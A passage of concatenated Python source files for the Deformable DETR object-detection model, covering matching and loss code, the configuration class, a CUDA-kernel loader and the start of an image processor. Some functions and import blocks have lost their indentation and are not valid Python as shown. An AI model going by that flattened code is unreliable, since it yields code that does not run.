    @torch.no_grad()
    # Copied from transformers.models.detr.modeling_detr.DetrLoss.loss_cardinality
    def loss_cardinality(self, outputs, targets, indices, num_boxes):
        """
        Compute the cardinality error, i.e. the absolute error in the number of predicted non-empty boxes.

        This is not really a loss, it is intended for logging purposes only. It doesn't propagate gradients.
        """
        logits = outputs["logits"]
        device = logits.device
        target_lengths = torch.as_tensor([len(v["class_labels"]) for v in targets], device=device)
        # Count the number of predictions that are NOT "no-object" (which is the last class)
        card_pred = (logits.argmax(-1) != logits.shape[-1] - 1).sum(1)
        card_err = nn.functional.l1_loss(card_pred.float(), target_lengths.float())
        losses = {"cardinality_error": card_err}
        return losses

    # Copied from transformers.models.detr.modeling_detr.DetrLoss.loss_boxes
    def loss_boxes(self, outputs, targets, indices, num_boxes):
        """
        Compute the losses related to the bounding boxes, the L1 regression loss and the GIoU loss.

        Targets dicts must contain the key "boxes" containing a tensor of dim [nb_target_boxes, 4]. The target boxes
        are expected in format (center_x, center_y, w, h), normalized by the image size.
        """
        if "pred_boxes" not in outputs:
            raise KeyError("No predicted boxes found in outputs")
        idx = self._get_source_permutation_idx(indices)
        source_boxes = outputs["pred_boxes"][idx]
        target_boxes = torch.cat([t["boxes"][i] for t, (_, i) in zip(targets, indices)], dim=0)
        loss_bbox = nn.functional.l1_loss(source_boxes, target_boxes, reduction="none")
        losses = {}
        losses["loss_bbox"] = loss_bbox.sum() / num_boxes
        loss_giou = 1 - torch.diag(
            generalized_box_iou(center_to_corners_format(source_boxes), center_to_corners_format(target_boxes))
        )
        losses["loss_giou"] = loss_giou.sum() / num_boxes
        return losses

    # Copied from transformers.models.detr.modeling_detr.DetrLoss._get_source_permutation_idx
    def _get_source_permutation_idx(self, indices):
        # permute predictions following indices
        batch_idx = torch.cat([torch.full_like(source, i) for i, (source, _) in enumerate(indices)])
        source_idx = torch.cat([source for (source, _) in indices])
        return batch_idx, source_idx

    # Copied from transformers.models.detr.modeling_detr.DetrLoss._get_target_permutation_idx
    def _get_target_permutation_idx(self, indices):
        # permute targets following indices
        batch_idx = torch.cat([torch.full_like(target, i) for i, (_, target) in enumerate(indices)])
        target_idx = torch.cat([target for (_, target) in indices])
        return batch_idx, target_idx

    def get_loss(self, loss, outputs, targets, indices, num_boxes):
        # Dispatch table mapping a loss name to its implementation.
        loss_map = {
            "labels": self.loss_labels,
            "cardinality": self.loss_cardinality,
            "boxes": self.loss_boxes,
        }
        if loss not in loss_map:
            raise ValueError(f"Loss {loss} not supported")
        return loss_map[loss](outputs, targets, indices, num_boxes)

    def forward(self, outputs, targets):
        """
        This performs the loss computation.

        Args:
            outputs (`dict`, *optional*):
                Dictionary of tensors, see the output specification of the model for the format.
            targets (`List[dict]`, *optional*):
                List of dicts, such that `len(targets) == batch_size`. The expected keys in each dict depends on the
                losses applied, see each loss' doc.
        """
        outputs_without_aux = {k: v for k, v in outputs.items() if k != "auxiliary_outputs"}
        # Retrieve the matching between the outputs of the last layer and the targets
        indices = self.matcher(outputs_without_aux, targets)
        # Compute the average number of target boxes accross all nodes, for normalization purposes
        num_boxes = sum(len(t["class_labels"]) for t in targets)
        num_boxes = torch.as_tensor([num_boxes], dtype=torch.float, device=next(iter(outputs.values())).device)
        # (Niels): comment out function below, distributed training to be added
        # if is_dist_avail_and_initialized():
        #     torch.distributed.all_reduce(num_boxes)
        # (Niels) in original implementation, num_boxes is divided by get_world_size()
        num_boxes = torch.clamp(num_boxes, min=1).item()
        # Compute all the requested losses
        losses = {}
        for loss in self.losses:
            losses.update(self.get_loss(loss, outputs, targets, indices, num_boxes))
        # In case of auxiliary losses, we repeat this process with the output of each intermediate layer.
        if "auxiliary_outputs" in outputs:
            for i, auxiliary_outputs in enumerate(outputs["auxiliary_outputs"]):
                indices = self.matcher(auxiliary_outputs, targets)
                for loss in self.losses:
                    l_dict = self.get_loss(loss, auxiliary_outputs, targets, indices, num_boxes)
                    l_dict = {k + f"_{i}": v for k, v in l_dict.items()}
                    losses.update(l_dict)
        if "enc_outputs" in outputs:
            enc_outputs = outputs["enc_outputs"]
            bin_targets = copy.deepcopy(targets)
            for bt in bin_targets:
                # Fix: targets carry the "class_labels" key (not "labels"). The first stage is
                # class-agnostic, so every target is relabeled as foreground (class 0).
                bt["class_labels"] = torch.zeros_like(bt["class_labels"])
            indices = self.matcher(enc_outputs, bin_targets)
            for loss in self.losses:
                # Fix: `loss_labels` no longer accepts a `log` argument (see note above),
                # so no extra kwargs are forwarded here.
                l_dict = self.get_loss(loss, enc_outputs, bin_targets, indices, num_boxes)
                l_dict = {k + "_enc": v for k, v in l_dict.items()}
                losses.update(l_dict)
        return losses
# Copied from transformers.models.detr.modeling_detr.DetrMLPPredictionHead
class DeformableDetrMLPPredictionHead(nn.Module):
    """
    Very simple multi-layer perceptron (MLP, also called FFN), used to predict the normalized center coordinates,
    height and width of a bounding box w.r.t. an image.

    Copied from https://github.com/facebookresearch/detr/blob/master/models/detr.py
    """

    def __init__(self, input_dim, hidden_dim, output_dim, num_layers):
        super().__init__()
        self.num_layers = num_layers
        # Layer sizes: input_dim -> hidden_dim (num_layers - 1 times) -> output_dim.
        dims = [input_dim] + [hidden_dim] * (num_layers - 1) + [output_dim]
        self.layers = nn.ModuleList(nn.Linear(in_dim, out_dim) for in_dim, out_dim in zip(dims[:-1], dims[1:]))

    def forward(self, x):
        last = self.num_layers - 1
        # ReLU after every layer except the final projection.
        for index, layer in enumerate(self.layers):
            x = layer(x)
            if index < last:
                x = nn.functional.relu(x)
        return x
class DeformableDetrHungarianMatcher(nn.Module):
    """
    This class computes an assignment between the targets and the predictions of the network.

    For efficiency reasons, the targets don't include the no_object. Because of this, in general, there are more
    predictions than targets. In this case, we do a 1-to-1 matching of the best predictions, while the others are
    un-matched (and thus treated as non-objects).

    Args:
        class_cost:
            The relative weight of the classification error in the matching cost.
        bbox_cost:
            The relative weight of the L1 error of the bounding box coordinates in the matching cost.
        giou_cost:
            The relative weight of the giou loss of the bounding box in the matching cost.
    """

    def __init__(self, class_cost: float = 1, bbox_cost: float = 1, giou_cost: float = 1):
        super().__init__()
        requires_backends(self, ["scipy"])
        self.class_cost = class_cost
        self.bbox_cost = bbox_cost
        self.giou_cost = giou_cost
        # A matcher with every weight at zero would make the assignment meaningless.
        if class_cost == 0 and bbox_cost == 0 and giou_cost == 0:
            raise ValueError("All costs of the Matcher can't be 0")

    @torch.no_grad()
    def forward(self, outputs, targets):
        """
        Args:
            outputs (`dict`):
                A dictionary that contains at least these entries:
                * "logits": Tensor of dim [batch_size, num_queries, num_classes] with the classification logits
                * "pred_boxes": Tensor of dim [batch_size, num_queries, 4] with the predicted box coordinates.
            targets (`List[dict]`):
                A list of targets (len(targets) = batch_size), where each target is a dict containing:
                * "class_labels": Tensor of dim [num_target_boxes] (where num_target_boxes is the number of
                  ground-truth
                 objects in the target) containing the class labels
                * "boxes": Tensor of dim [num_target_boxes, 4] containing the target box coordinates.

        Returns:
            `List[Tuple]`: A list of size `batch_size`, containing tuples of (index_i, index_j) where:
            - index_i is the indices of the selected predictions (in order)
            - index_j is the indices of the corresponding selected targets (in order)
            For each batch element, it holds: len(index_i) = len(index_j) = min(num_queries, num_target_boxes)
        """
        batch_size, num_queries = outputs["logits"].shape[:2]
        # Flatten batch and query dimensions so every cost matrix is computed in one pass.
        out_prob = outputs["logits"].flatten(0, 1).sigmoid()  # [batch_size * num_queries, num_classes]
        out_bbox = outputs["pred_boxes"].flatten(0, 1)  # [batch_size * num_queries, 4]
        # Concatenate the targets of the whole batch.
        target_ids = torch.cat([v["class_labels"] for v in targets])
        target_bbox = torch.cat([v["boxes"] for v in targets])
        # Classification cost: difference of the focal-loss terms evaluated at the target classes.
        alpha, gamma = 0.25, 2.0
        negative_term = (1 - alpha) * (out_prob**gamma) * (-(1 - out_prob + 1e-8).log())
        positive_term = alpha * ((1 - out_prob) ** gamma) * (-(out_prob + 1e-8).log())
        class_cost = positive_term[:, target_ids] - negative_term[:, target_ids]
        # L1 cost between predicted and target boxes.
        bbox_cost = torch.cdist(out_bbox, target_bbox, p=1)
        # Negative generalized IoU cost (both box sets converted to corner format first).
        giou_cost = -generalized_box_iou(center_to_corners_format(out_bbox), center_to_corners_format(target_bbox))
        # Weighted sum, reshaped back to one [num_queries, num_targets_in_batch] matrix per image.
        cost_matrix = self.bbox_cost * bbox_cost + self.class_cost * class_cost + self.giou_cost * giou_cost
        cost_matrix = cost_matrix.view(batch_size, num_queries, -1).cpu()
        # Solve one Hungarian assignment per image over its own slice of target columns.
        sizes = [len(v["boxes"]) for v in targets]
        assignments = [linear_sum_assignment(c[i]) for i, c in enumerate(cost_matrix.split(sizes, -1))]
        return [
            (torch.as_tensor(row, dtype=torch.int64), torch.as_tensor(col, dtype=torch.int64))
            for row, col in assignments
        ]
# Copied from transformers.models.detr.modeling_detr._upcast
def _upcast(t: Tensor) -> Tensor:
# Protects from numerical overflows in multiplications by upcasting to the equivalent higher type
if t.is_floating_point():
return t if t.dtype in (torch.float32, torch.float64) else t.float()
else:
return t if t.dtype in (torch.int32, torch.int64) else t.int()
# Copied from transformers.models.detr.modeling_detr.box_area
def box_area(boxes: Tensor) -> Tensor:
    """
    Computes the area of a set of bounding boxes, which are specified by its (x1, y1, x2, y2) coordinates.

    Args:
        boxes (`torch.FloatTensor` of shape `(number_of_boxes, 4)`):
            Boxes for which the area will be computed. They are expected to be in (x1, y1, x2, y2) format with `0 <= x1
            < x2` and `0 <= y1 < y2`.

    Returns:
        `torch.FloatTensor`: a tensor containing the area for each box.
    """
    # Upcast first so the width * height product cannot overflow narrow dtypes.
    boxes = _upcast(boxes)
    widths = boxes[:, 2] - boxes[:, 0]
    heights = boxes[:, 3] - boxes[:, 1]
    return widths * heights
# Copied from transformers.models.detr.modeling_detr.box_iou
def box_iou(boxes1, boxes2):
    # Pairwise IoU between two sets of corner-format boxes; also returns the union areas.
    areas1 = box_area(boxes1)
    areas2 = box_area(boxes2)
    top_left = torch.max(boxes1[:, None, :2], boxes2[:, :2])  # [N,M,2]
    bottom_right = torch.min(boxes1[:, None, 2:], boxes2[:, 2:])  # [N,M,2]
    # Non-overlapping pairs produce negative extents, clamped to zero area.
    intersect_wh = (bottom_right - top_left).clamp(min=0)  # [N,M,2]
    intersection = intersect_wh[:, :, 0] * intersect_wh[:, :, 1]  # [N,M]
    union = areas1[:, None] + areas2 - intersection
    return intersection / union, union
# Copied from transformers.models.detr.modeling_detr.generalized_box_iou
def generalized_box_iou(boxes1, boxes2):
    """
    Generalized IoU from https://giou.stanford.edu/. The boxes should be in [x0, y0, x1, y1] (corner) format.

    Returns:
        `torch.FloatTensor`: a [N, M] pairwise matrix, where N = len(boxes1) and M = len(boxes2)
    """
    # Degenerate boxes would produce inf / nan below, so validate corner ordering up front.
    if not (boxes1[:, 2:] >= boxes1[:, :2]).all():
        raise ValueError(f"boxes1 must be in [x0, y0, x1, y1] (corner) format, but got {boxes1}")
    if not (boxes2[:, 2:] >= boxes2[:, :2]).all():
        raise ValueError(f"boxes2 must be in [x0, y0, x1, y1] (corner) format, but got {boxes2}")
    iou, union = box_iou(boxes1, boxes2)
    # Smallest axis-aligned box enclosing each pair.
    enclosing_tl = torch.min(boxes1[:, None, :2], boxes2[:, :2])
    enclosing_br = torch.max(boxes1[:, None, 2:], boxes2[:, 2:])
    enclosing_wh = (enclosing_br - enclosing_tl).clamp(min=0)  # [N,M,2]
    enclosing_area = enclosing_wh[:, :, 0] * enclosing_wh[:, :, 1]
    return iou - (enclosing_area - union) / enclosing_area
# Copied from transformers.models.detr.modeling_detr._max_by_axis
def _max_by_axis(the_list):
# type: (List[List[int]]) -> List[int]
maxes = the_list[0]
for sublist in the_list[1:]:
for index, item in enumerate(sublist):
maxes[index] = max(maxes[index], item)
return maxes
# Copied from transformers.models.detr.modeling_detr.NestedTensor
class NestedTensor(object):
    """Container pairing a (padded) batched tensor with its padding mask."""

    def __init__(self, tensors, mask: Optional[Tensor]):
        self.tensors = tensors
        self.mask = mask

    def to(self, device):
        """Return a new NestedTensor with both members moved to `device`."""
        moved_tensors = self.tensors.to(device)
        moved_mask = None if self.mask is None else self.mask.to(device)
        return NestedTensor(moved_tensors, moved_mask)

    def decompose(self):
        """Split back into the `(tensors, mask)` pair."""
        return self.tensors, self.mask

    def __repr__(self):
        return str(self.tensors)
# Copied from transformers.models.detr.modeling_detr.nested_tensor_from_tensor_list
def nested_tensor_from_tensor_list(tensor_list: List[Tensor]):
    """
    Pad a list of 3D (channels, height, width) tensors to a common shape and
    wrap them in a NestedTensor, whose boolean mask is True on padded pixels.
    """
    if tensor_list[0].ndim != 3:
        raise ValueError("Only 3-dimensional tensors are supported")
    max_size = _max_by_axis([list(img.shape) for img in tensor_list])
    batch_shape = [len(tensor_list)] + max_size
    batch_size, num_channels, height, width = batch_shape
    first = tensor_list[0]
    # Zero-filled batch; each image is copied into the top-left corner of its slot.
    padded = torch.zeros(batch_shape, dtype=first.dtype, device=first.device)
    mask = torch.ones((batch_size, height, width), dtype=torch.bool, device=first.device)
    for img, pad_slot, mask_slot in zip(tensor_list, padded, mask):
        channels, img_height, img_width = img.shape
        pad_slot[:channels, :img_height, :img_width].copy_(img)
        # Valid (non-padded) pixels are marked False.
        mask_slot[:img_height, :img_width] = False
    return NestedTensor(padded, mask)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 13,361 | src/transformers/models/deformable_detr/configuration_deformable_detr.py | # coding=utf-8
# Copyright 2022 SenseTime and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Deformable DETR model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
from ..auto import CONFIG_MAPPING
logger = logging.get_logger(__name__)
# Maps canonical checkpoint names to the URL of their hosted config.json.
DEFORMABLE_DETR_PRETRAINED_CONFIG_ARCHIVE_MAP = {
    "SenseTime/deformable-detr": "https://huggingface.co/sensetime/deformable-detr/resolve/main/config.json",
    # See all Deformable DETR models at https://huggingface.co/models?filter=deformable-detr
}
class DeformableDetrConfig(PretrainedConfig):
    r"""
    This is the configuration class to store the configuration of a [`DeformableDetrModel`]. It is used to instantiate
    a Deformable DETR model according to the specified arguments, defining the model architecture. Instantiating a
    configuration with the defaults will yield a similar configuration to that of the Deformable DETR
    [SenseTime/deformable-detr](https://huggingface.co/SenseTime/deformable-detr) architecture.
    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.
    Args:
        use_timm_backbone (`bool`, *optional*, defaults to `True`):
            Whether or not to use the `timm` library for the backbone. If set to `False`, will use the [`AutoBackbone`]
            API.
        backbone_config (`PretrainedConfig` or `dict`, *optional*):
            The configuration of the backbone model. Only used in case `use_timm_backbone` is set to `False` in which
            case it will default to `ResNetConfig()`.
        num_channels (`int`, *optional*, defaults to 3):
            The number of input channels.
        num_queries (`int`, *optional*, defaults to 300):
            Number of object queries, i.e. detection slots. This is the maximal number of objects
            [`DeformableDetrModel`] can detect in a single image. In case `two_stage` is set to `True`, we use
            `two_stage_num_proposals` instead.
        d_model (`int`, *optional*, defaults to 256):
            Dimension of the layers.
        encoder_layers (`int`, *optional*, defaults to 6):
            Number of encoder layers.
        decoder_layers (`int`, *optional*, defaults to 6):
            Number of decoder layers.
        encoder_attention_heads (`int`, *optional*, defaults to 8):
            Number of attention heads for each attention layer in the Transformer encoder.
        decoder_attention_heads (`int`, *optional*, defaults to 8):
            Number of attention heads for each attention layer in the Transformer decoder.
        decoder_ffn_dim (`int`, *optional*, defaults to 1024):
            Dimension of the "intermediate" (often named feed-forward) layer in decoder.
        encoder_ffn_dim (`int`, *optional*, defaults to 1024):
            Dimension of the "intermediate" (often named feed-forward) layer in decoder.
        activation_function (`str` or `function`, *optional*, defaults to `"relu"`):
            The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
            `"relu"`, `"silu"` and `"gelu_new"` are supported.
        dropout (`float`, *optional*, defaults to 0.1):
            The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
        attention_dropout (`float`, *optional*, defaults to 0.0):
            The dropout ratio for the attention probabilities.
        activation_dropout (`float`, *optional*, defaults to 0.0):
            The dropout ratio for activations inside the fully connected layer.
        init_std (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
        init_xavier_std (`float`, *optional*, defaults to 1):
            The scaling factor used for the Xavier initialization gain in the HM Attention map module.
        encoder_layerdrop: (`float`, *optional*, defaults to 0.0):
            The LayerDrop probability for the encoder. See the [LayerDrop paper](see https://arxiv.org/abs/1909.11556)
            for more details.
        auxiliary_loss (`bool`, *optional*, defaults to `False`):
            Whether auxiliary decoding losses (loss at each decoder layer) are to be used.
        position_embedding_type (`str`, *optional*, defaults to `"sine"`):
            Type of position embeddings to be used on top of the image features. One of `"sine"` or `"learned"`.
        backbone (`str`, *optional*, defaults to `"resnet50"`):
            Name of convolutional backbone to use in case `use_timm_backbone` = `True`. Supports any convolutional
            backbone from the timm package. For a list of all available models, see [this
            page](https://rwightman.github.io/pytorch-image-models/#load-a-pretrained-model).
        use_pretrained_backbone (`bool`, *optional*, defaults to `True`):
            Whether to use pretrained weights for the backbone. Only supported when `use_timm_backbone` = `True`.
        dilation (`bool`, *optional*, defaults to `False`):
            Whether to replace stride with dilation in the last convolutional block (DC5). Only supported when
            `use_timm_backbone` = `True`.
        class_cost (`float`, *optional*, defaults to 1):
            Relative weight of the classification error in the Hungarian matching cost.
        bbox_cost (`float`, *optional*, defaults to 5):
            Relative weight of the L1 error of the bounding box coordinates in the Hungarian matching cost.
        giou_cost (`float`, *optional*, defaults to 2):
            Relative weight of the generalized IoU loss of the bounding box in the Hungarian matching cost.
        mask_loss_coefficient (`float`, *optional*, defaults to 1):
            Relative weight of the Focal loss in the panoptic segmentation loss.
        dice_loss_coefficient (`float`, *optional*, defaults to 1):
            Relative weight of the DICE/F-1 loss in the panoptic segmentation loss.
        bbox_loss_coefficient (`float`, *optional*, defaults to 5):
            Relative weight of the L1 bounding box loss in the object detection loss.
        giou_loss_coefficient (`float`, *optional*, defaults to 2):
            Relative weight of the generalized IoU loss in the object detection loss.
        eos_coefficient (`float`, *optional*, defaults to 0.1):
            Relative classification weight of the 'no-object' class in the object detection loss.
        num_feature_levels (`int`, *optional*, defaults to 4):
            The number of input feature levels.
        encoder_n_points (`int`, *optional*, defaults to 4):
            The number of sampled keys in each feature level for each attention head in the encoder.
        decoder_n_points (`int`, *optional*, defaults to 4):
            The number of sampled keys in each feature level for each attention head in the decoder.
        two_stage (`bool`, *optional*, defaults to `False`):
            Whether to apply a two-stage deformable DETR, where the region proposals are also generated by a variant of
            Deformable DETR, which are further fed into the decoder for iterative bounding box refinement.
        two_stage_num_proposals (`int`, *optional*, defaults to 300):
            The number of region proposals to be generated, in case `two_stage` is set to `True`.
        with_box_refine (`bool`, *optional*, defaults to `False`):
            Whether to apply iterative bounding box refinement, where each decoder layer refines the bounding boxes
            based on the predictions from the previous layer.
        focal_alpha (`float`, *optional*, defaults to 0.25):
            Alpha parameter in the focal loss.
    Examples:
    ```python
    >>> from transformers import DeformableDetrConfig, DeformableDetrModel
    >>> # Initializing a Deformable DETR SenseTime/deformable-detr style configuration
    >>> configuration = DeformableDetrConfig()
    >>> # Initializing a model (with random weights) from the SenseTime/deformable-detr style configuration
    >>> model = DeformableDetrModel(configuration)
    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```"""
    model_type = "deformable_detr"
    # Map the standard PretrainedConfig attribute names onto this model's names.
    attribute_map = {
        "hidden_size": "d_model",
        "num_attention_heads": "encoder_attention_heads",
    }
    def __init__(
        self,
        use_timm_backbone=True,
        backbone_config=None,
        num_channels=3,
        num_queries=300,
        max_position_embeddings=1024,
        encoder_layers=6,
        encoder_ffn_dim=1024,
        encoder_attention_heads=8,
        decoder_layers=6,
        decoder_ffn_dim=1024,
        decoder_attention_heads=8,
        encoder_layerdrop=0.0,
        is_encoder_decoder=True,
        activation_function="relu",
        d_model=256,
        dropout=0.1,
        attention_dropout=0.0,
        activation_dropout=0.0,
        init_std=0.02,
        init_xavier_std=1.0,
        return_intermediate=True,
        auxiliary_loss=False,
        position_embedding_type="sine",
        backbone="resnet50",
        use_pretrained_backbone=True,
        dilation=False,
        num_feature_levels=4,
        encoder_n_points=4,
        decoder_n_points=4,
        two_stage=False,
        two_stage_num_proposals=300,
        with_box_refine=False,
        class_cost=1,
        bbox_cost=5,
        giou_cost=2,
        mask_loss_coefficient=1,
        dice_loss_coefficient=1,
        bbox_loss_coefficient=5,
        giou_loss_coefficient=2,
        eos_coefficient=0.1,
        focal_alpha=0.25,
        **kwargs,
    ):
        # A timm backbone and an explicit backbone config are mutually exclusive.
        if backbone_config is not None and use_timm_backbone:
            raise ValueError("You can't specify both `backbone_config` and `use_timm_backbone`.")
        if not use_timm_backbone:
            if backbone_config is None:
                logger.info("`backbone_config` is `None`. Initializing the config with the default `ResNet` backbone.")
                backbone_config = CONFIG_MAPPING["resnet"](out_features=["stage4"])
            elif isinstance(backbone_config, dict):
                # Rehydrate a serialized backbone config into its proper config class.
                backbone_model_type = backbone_config.get("model_type")
                config_class = CONFIG_MAPPING[backbone_model_type]
                backbone_config = config_class.from_dict(backbone_config)
        self.use_timm_backbone = use_timm_backbone
        self.backbone_config = backbone_config
        self.num_channels = num_channels
        self.num_queries = num_queries
        self.max_position_embeddings = max_position_embeddings
        self.d_model = d_model
        self.encoder_ffn_dim = encoder_ffn_dim
        self.encoder_layers = encoder_layers
        self.encoder_attention_heads = encoder_attention_heads
        self.decoder_ffn_dim = decoder_ffn_dim
        self.decoder_layers = decoder_layers
        self.decoder_attention_heads = decoder_attention_heads
        self.dropout = dropout
        self.attention_dropout = attention_dropout
        self.activation_dropout = activation_dropout
        self.activation_function = activation_function
        self.init_std = init_std
        self.init_xavier_std = init_xavier_std
        self.encoder_layerdrop = encoder_layerdrop
        self.auxiliary_loss = auxiliary_loss
        self.position_embedding_type = position_embedding_type
        self.backbone = backbone
        self.use_pretrained_backbone = use_pretrained_backbone
        self.dilation = dilation
        # deformable attributes
        self.num_feature_levels = num_feature_levels
        self.encoder_n_points = encoder_n_points
        self.decoder_n_points = decoder_n_points
        self.two_stage = two_stage
        self.two_stage_num_proposals = two_stage_num_proposals
        self.with_box_refine = with_box_refine
        # Two-stage operation requires iterative box refinement to be enabled.
        if two_stage is True and with_box_refine is False:
            raise ValueError("If two_stage is True, with_box_refine must be True.")
        # Hungarian matcher
        self.class_cost = class_cost
        self.bbox_cost = bbox_cost
        self.giou_cost = giou_cost
        # Loss coefficients
        self.mask_loss_coefficient = mask_loss_coefficient
        self.dice_loss_coefficient = dice_loss_coefficient
        self.bbox_loss_coefficient = bbox_loss_coefficient
        self.giou_loss_coefficient = giou_loss_coefficient
        self.eos_coefficient = eos_coefficient
        self.focal_alpha = focal_alpha
        super().__init__(is_encoder_decoder=is_encoder_decoder, **kwargs)
    @property
    def num_attention_heads(self) -> int:
        """Alias for `encoder_attention_heads`, matching the common config API."""
        return self.encoder_attention_heads
    @property
    def hidden_size(self) -> int:
        """Alias for `d_model`, matching the common config API."""
        return self.d_model
|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,635 | src/transformers/models/deformable_detr/load_custom.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Loading of Deformable DETR's CUDA kernels"""
import os
def load_cuda_kernels():
    """
    JIT-compile and import the MultiScaleDeformableAttention C++/CUDA extension.

    The kernel sources ship next to this file in the ``custom_kernel`` directory;
    ``torch.utils.cpp_extension.load`` builds them on first use.

    Returns:
        The imported ``MultiScaleDeformableAttention`` extension module.
    """
    from torch.utils.cpp_extension import load
    # Sources live under <this file's directory>/custom_kernel/.
    root = os.path.join(os.path.dirname(os.path.realpath(__file__)), "custom_kernel")
    src_files = [
        os.path.join(root, filename)
        for filename in [
            "vision.cpp",
            os.path.join("cpu", "ms_deform_attn_cpu.cpp"),
            os.path.join("cuda", "ms_deform_attn_cuda.cu"),
        ]
    ]
    load(
        "MultiScaleDeformableAttention",
        src_files,
        # verbose=True,
        with_cuda=True,
        extra_include_paths=[root],
        # build_directory=os.path.dirname(os.path.realpath(__file__)),
        extra_cflags=["-DWITH_CUDA=1"],
        # The __CUDA_NO_HALF* defines disable CUDA's half-precision operator
        # overloads during compilation of these kernels.
        extra_cuda_cflags=[
            "-DCUDA_HAS_FP16=1",
            "-D__CUDA_NO_HALF_OPERATORS__",
            "-D__CUDA_NO_HALF_CONVERSIONS__",
            "-D__CUDA_NO_HALF2_OPERATORS__",
        ],
    )
    # load() above makes the extension importable under this module name.
    import MultiScaleDeformableAttention as MSDA
    return MSDA
|
27182812/ChatGLM-LLaMA-chinese-insturct | 60,029 | src/transformers/models/deformable_detr/image_processing_deformable_detr.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image processor class for Deformable DETR."""
import io
import pathlib
import warnings
from collections import defaultdict
from typing import Any, Callable, Dict, Iterable, List, Optional, Set, Tuple, Union
import numpy as np
from ...feature_extraction_utils import BatchFeature
from ...image_processing_utils import BaseImageProcessor, get_size_dict
from ...image_transforms import (
PaddingMode,
center_to_corners_format,
corners_to_center_format,
id_to_rgb,
normalize,
pad,
rescale,
resize,
rgb_to_id,
to_channel_dimension_format,
)
from ...image_utils import (
IMAGENET_DEFAULT_MEAN,
IMAGENET_DEFAULT_STD,
ChannelDimension,
ImageInput,
PILImageResampling,
get_image_size,
infer_channel_dimension_format,
make_list_of_images,
to_numpy_array,
valid_coco_detection_annotations,
valid_coco_panoptic_annotations,
valid_images,
)
from ...utils import (
ExplicitEnum,
TensorType,
is_flax_available,
is_jax_tensor,
is_scipy_available,
is_tf_available,
is_tf_tensor,
is_torch_available,
is_torch_tensor,
is_vision_available,
)
if is_torch_available():
import torch
from torch import nn
from ...pytorch_utils import torch_int_div
if is_vision_available():
import PIL
if is_scipy_available():
import scipy.special
import scipy.stats
# A COCO-style annotation dict: ids/strings at the top level plus a list of object dicts.
AnnotationType = Dict[str, Union[int, str, List[Dict]]]
class AnnotionFormat(ExplicitEnum):
    # NOTE(review): the class name looks misspelled ("Annotion") — presumably kept
    # as-is for API compatibility; confirm before renaming.
    COCO_DETECTION = "coco_detection"
    COCO_PANOPTIC = "coco_panoptic"
SUPPORTED_ANNOTATION_FORMATS = (AnnotionFormat.COCO_DETECTION, AnnotionFormat.COCO_PANOPTIC)
# Copied from transformers.models.detr.image_processing_detr.get_size_with_aspect_ratio
def get_size_with_aspect_ratio(image_size, size, max_size=None) -> Tuple[int, int]:
    """
    Computes the output image size given the input image size and the desired output size.
    Args:
        image_size (`Tuple[int, int]`):
            The input image size, as (height, width).
        size (`int`):
            The desired size of the shorter side.
        max_size (`int`, *optional*):
            The maximum allowed size of the longer side.
    """
    height, width = image_size
    short_side = float(min(height, width))
    long_side = float(max(height, width))
    # Shrink the request when scaling the short side to `size` would push the
    # long side beyond `max_size`.
    if max_size is not None and long_side / short_side * size > max_size:
        size = int(round(max_size * short_side / long_side))
    # Already at the requested short-side size: keep the original dimensions.
    if (height <= width and height == size) or (width <= height and width == size):
        return height, width
    if width < height:
        new_width = size
        new_height = int(size * height / width)
    else:
        new_height = size
        new_width = int(size * width / height)
    return (new_height, new_width)
# Copied from transformers.models.detr.image_processing_detr.get_resize_output_image_size
def get_resize_output_image_size(
    input_image: np.ndarray, size: Union[int, Tuple[int, int], List[int]], max_size: Optional[int] = None
) -> Tuple[int, int]:
    """
    Computes the output image size given the input image size and the desired output size. If the desired output size
    is a tuple or list, the output image size is returned as is. If the desired output size is an integer, the output
    image size is computed by keeping the aspect ratio of the input image size.
    Args:
        input_image (`np.ndarray`):
            The image to compute the output size for.
        size (`int` or `Tuple[int, int]` or `List[int]`):
            The desired output size.
        max_size (`int`, *optional*):
            The maximum allowed output size.
    """
    input_height_width = get_image_size(input_image)
    # An explicit (height, width) request is honored as-is.
    if isinstance(size, (list, tuple)):
        return size
    # An integer request targets the shorter side while preserving aspect ratio.
    return get_size_with_aspect_ratio(input_height_width, size, max_size)
# Copied from transformers.models.detr.image_processing_detr.get_numpy_to_framework_fn
def get_numpy_to_framework_fn(arr) -> Callable:
    """
    Returns a function that converts a numpy array to the framework of the input array.
    Args:
        arr (`np.ndarray`): The array to convert.
    """
    # Plain numpy arrays stay in numpy.
    if isinstance(arr, np.ndarray):
        return np.array
    # Each backend check is guarded by an availability test so that optional
    # frameworks (TF / torch / JAX) are only imported when actually installed.
    if is_tf_available() and is_tf_tensor(arr):
        import tensorflow as tf
